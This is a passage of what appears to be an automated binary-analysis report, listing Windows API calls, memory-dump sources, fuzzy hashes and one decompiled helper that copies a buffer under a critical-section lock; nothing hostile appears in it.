                                                            • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??3@CloseHandle
                                                            • String ID: $l@
                                                            • API String ID: 3816424416-2140230165
                                                            • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                            • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                                                            • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                            • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
                                                            				void* _t13;
                                                            				void* _t16;
                                                            				struct _CRITICAL_SECTION* _t19;
                                                            				void* _t20;
                                                            
                                                            				_t20 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 8)) == 0) {
                                                            					L3:
                                                            					return 0;
                                                            				}
                                                            				_t19 = __ecx + 0x10;
                                                            				EnterCriticalSection(_t19);
                                                            				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
                                                            				_push(_t19);
                                                            				if(_t13 != 0) {
                                                            					LeaveCriticalSection();
                                                            					memcpy(_a12, _a4, _a8);
                                                            					 *_a16 = _a8;
                                                            					_t16 = 1;
                                                            					return _t16;
                                                            				}
                                                            				LeaveCriticalSection();
                                                            				goto L3;
                                                            			}







                                                            0x004019e5
                                                            0x004019ec
                                                            0x00401a19
                                                            0x00000000
                                                            0x00401a19
                                                            0x004019ee
                                                            0x004019f2
                                                            0x00401a08
                                                            0x00401a10
                                                            0x00401a11
                                                            0x00401a1d
                                                            0x00401a2c
                                                            0x00401a3a
                                                            0x00401a3e
                                                            0x00000000
                                                            0x00401a3e
                                                            0x00401a13
                                                            0x00000000

                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                                                            • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Entermemcpy
                                                            • String ID:
                                                            • API String ID: 3435569088-0
                                                            • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                            • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                                                            • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                            • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%